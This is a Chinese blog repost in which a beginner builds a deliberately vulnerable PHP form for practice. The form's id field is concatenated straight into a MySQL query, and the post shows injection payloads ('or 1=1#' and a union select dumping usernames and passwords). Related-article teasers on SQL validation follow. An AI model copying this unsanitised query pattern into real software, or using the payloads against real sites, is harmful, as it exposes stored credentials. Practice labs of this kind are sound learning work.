sql—前端验证

最新推荐文章于 2024-05-05 00:15:51 发布
最新推荐文章于 2024-05-05 00:15:51 发布
阅读量516 收藏
点赞数
文章标签: 前端 数据库 php ViewUI
原文链接:http://www.cnblogs.com/M3tar/p/7341450.html
版权
写了一个前端验证,html也忘记了,页面写的很粗略,将就看一下,毕竟是我人生第一个自己写的漏洞

 

 

 

主界面,省略掉测试他是否有漏洞。

 

 

Id处输入: 1’ or 1=1#

 

省略中间步骤,直接爆一下东西:

输入:1’ and 1=2 union select 1,2,group_concat(username,0x3a,password) from user#

 

 

这里贴一下我的代码

 <html>
<head>
    <title>M3tar的第一个注入</title>
    <meta http-equiv="content-type"content="text/html"charset="Unicode">
</head>
<body>
<form action="M-star.php" method="post">
    <h1>Sql注入</h1>

    <table>
      <tr>
         <td>id</td>
         <td><input type="text" name="id"></td>
       </tr>
        <tr>
        <td>用户名</td>
        <td><input type="text" name="username"></td>
      </tr>
      <tr>
        <td>密 码</td>
        <td><input type="password" name="password"></td>
      </tr>
      <tr>
        <td><input type="submit" value="提交"></td>
        <td><input type="reset" value="重置"></td>
      </tr>
    </table>

</form>
</body>
</html>


<?php
if($_POST){
  $con=mysql_connect("localhost","root","root");
  mysql_select_db("csm",$con);

  $id = $_POST['id'];
  $sql="select * from user where id='$id'";
  $query=mysql_query($sql,$con);
  $arr=mysql_fetch_array($query, MYSQL_ASSOC);

  if(!empty($arr)){
     echo '<pre>',print_r($arr,1),'</pre>';
  }else{
      echo "输入有误";
  }
}
?>

 

关于写代码学到的一点点心得

1)php:写这个还是要对php有那么一点点的了解,对于数据库编程的内容也要有一些了解:

数据库的三层结构:客户端 mysql dbms 数据对象

2)可以总结一下mysql扩展库操作mysql数据库的步骤

3)关于phpstudy的理解:

  以前只是下了phpstudy,知道往WWW下扔东西,才知道还可以秒切换版本,很不错的功能,希望以后能多加应用。因为写一==这个个简单的sql注入漏洞的界面,emmm,很难受,写不来数据库,百度了半天,很瓜,原来phpstudy里面就可以新建数据库(phpMyadmin、Mysql-front),赶紧照着百度依葫芦画瓢,第一次接触这个自己后台的数据库,非常的兴奋。还有其他问题,现在还没有怎么遇到,以后再补充。

4)html和css感觉白学了,都记不得了,要抓紧时间补足啊。

5)POST和GET参数分别的优势和劣势 http://www.cnblogs.com/hyddd/archive/2009/03/31/1426026.html 详细的可以看这个资料

转载于:https://www.cnblogs.com/M3tar/p/7341450.html

aaxeah0297
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
js校验sql合法性_前端测试之视觉校验
weixin_28930859的博客
12-16 1826
前述:Hi~这是本菜鸟第二次关于前端测试的文章,基于第一次的关于前端性能的自动化测试之后的又一篇关于前端GUI层面的自动化测试的文章。那先来谈谈为什么做这个吧~背景:相信个大大小小的公司,在新版发布之后,都回去走一遍线上ui的测试,不论新增还是迭代,并且就算校验了,也不能阻止线上可能出现的偶发状况,比方前端在SSR的时候,某个字段内带有特殊字符,走到浏览器渲染层面的时候,就会被当成特殊字符解析...
如何用Java校验SQL语句的合法性?有这5种解决方案
pantouyuchiyu的博客
07-04 3018
要在Java中校验SQL语句的合法性,可以使用JDBC API中提供的Statement接口的execute()方法。这个方法会尝试执行给定的SQL语句,如果SQL语句不合法,则会抛出一个SQLException异常。因此,我们可以利用这个异常来判断SQL语句的合法性。
最佳实践-SQL语法校验
sunquan291的专栏
09-17 3188
在系统的版本发现过程,随需求的叠加,出现了多次版本的升级脚本填不对或忘的情况,虽然项目内严格要求研发必须针对SQL脚本手动执行且无报错前提下,才能验证通过。系统提供一前置检查框架,所以在前置检查框架中叠加对应的校验项即可,通过技术选型,使用alibaba的SQLParserUtils进行检查。一些常见的低级问题还是可以检查出来,将功能嵌入到微服务的前置检查中,一定程度上可以避免人为的失误。系统中,所以对于特定不支持的语法SQL,代码中进行了人为的异常保护。
2024年Web前端最全五小时三万字之一篇博文带你学会SQL【期末数据库稳了】,现在主流web开发工具
最新发布
2401_84446919的博客
05-05 649
编程基础的初级开发者,计算机科学专业的学生,以及平时没怎么利用过数据结构与算法的开发人员希望复习这些概念为下次技术面试做准备。或者想学习一些计算机科学的基本概念,以优化代码,提高编程技能。这份笔记都是可以作为参考的。开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】(2)增加一个字段,即给某个表增加一列alter table 表名称 add 【column】 字段名称 数据类型;#默认在最后。
验证SQL语法是否正确
Andrewniu的博客
05-02 1万+
昨天又有一个新的需求:验证文本框输入的SQL语法是否正确。于是就开始百度,其实也挺简单的。首先需要知道“SET PARSEONLY { ON | OFF }”。    当 SET PARSEONLY 为 ON 时,SQL Server 只分析语句。    当 SET PARSEONLY 为 OFF 时,SQL Server 编译并执行语句。    现在我们就可以完成SQL语法检测的功能了。下面是具...
前端参数效验防止sql注入的方法
weixin_43578304的博客
11-17 1719
最近做完项目时,甲方对系统有要过安全等保三级的要求,这里针对我所编的模块遇到的前端代码扫描出现的sql注入问题,给出部分解决方案。
前端验证源代码包括JQuery插件验证
12-24
在现代Web开发中,前端验证扮演着至关重要的角色,它能确保用户输入的数据符合预期,减少服务器端的处理压力,并提供即时的用户反馈。这里我们关注的是“前端验证源代码包括JQuery插件验证”,这涉及到JavaScript...
常有前端验证JS
04-16
`validate.js` 可能是一个专门用于前端验证的库,它提供了丰富的功能,帮助开发者确保用户输入的数据符合预期的格式和规则,从而提高用户体验并保护服务器免受无效或恶意数据的影响。下面将详细介绍这个主题中的相关...
实现sql语句正确验证的控件
04-25
本文将探讨如何实现一个用于验证SQL语句正确性的控件,并提供一个简单的实现例子。 首先,我们要理解SQL注入攻击。这是一种常见的网络安全威胁,攻击者通过在输入框中输入恶意构造的SQL语句,试图绕过系统验证,...
yeb项目yeb-server后端代码,yeb-web前端sql文件也有
03-10
【标题】"yeb项目"涉及的是一个完整的软件开发项目,其中包括了后端服务和前端展示部分,同时包含了数据库相关的SQL文件。这个项目名为"yeb",可能代表"云办公"或者"易办"等含义,具体业务场景可能是为企业或组织...
C#登录页面SQL数据库
11-13
在C#编程中,创建一个登录页面并与SQL数据库进行交互是一项常见的任务,这涉及到前端界面设计、用户输入验证以及后端数据库查询等多个方面。在这个场景中,我们将关注如何使用C#来实现这样的功能,以及与SQL数据库...
sql注入
进三步的博客
12-11 249
SQL注入攻击是黑客对数据库进行攻常用的手段之一,随着B/S模式应用开发的发展,使用这种模式编应用程序的程序员也越来越多。但是由于程序员的水平及经验参差不齐,相当大一部分程序员在编代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想获取的数据,这就是所谓的SQL Injection,即SQL注入。 一、背景 假如某高校开发了一个网课系统,要求学生选课后完成学习,数据库中有一张表course,这张表存放着每个学生的选课
sql语法检测
beiduofen2011的专栏
05-28 5340
maven配置: <dependency> <groupId>com.github.jsqlparser</groupId> <artifactId>jsqlparser</artifactId> <version>4.2</version> </dependency> 用 jsqlparser可以限定输
sql进行判断配置校验
ss_Tina的博客
03-21 618
1、用sql判断传进来的年龄是否在范围内 返回0表示不在 1表示在2、sql判断字段是否为空 可以将sql配置进数据库中,值进行动态替换select case when age is null then '年龄不能为空' else '' end age, case when person_name is null then '姓名不能为空' else '' end person_namefrom ( select '${AGE}$' age, '${AGE}$' person
使用alibaba Druid 对sql 语句进行校验
热门推荐
z69183787的专栏
10-18 1万+
使用到了 Druid中的 实现了 访问者模式的 各类visitor 对 sql 进行读取与解析 com.alibaba druid 1.0.17 List results = new ArrayList(); MySqlStatementParser parser = new MySqlStatementParser(sqls); List stm
前端代码编辑器ace 语法验证
weixin_30654583的博客
01-22 2855
本文主要是介绍实际项目中如何加入语法检测功能。官方文档链接https://github.com/ajaxorg/ace/wiki/Syntax-validation 代码编辑器ace,使用webworker进行实时语法检查。目前支持JavaScript,json,php,coffeescript,css,xquery模式。 根据官方https://ace.c9.io...
vue前端防止sql注入
08-22
总结起来,为了防止SQL注入攻击,需要在前端进行数据验证和过滤,使用参数化查询来构建SQL语句,并在数据库层面限制用户权限。这样可以有效地提高系统的安全性,防止SQL注入攻击的发生。<span class="em">1</span>...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值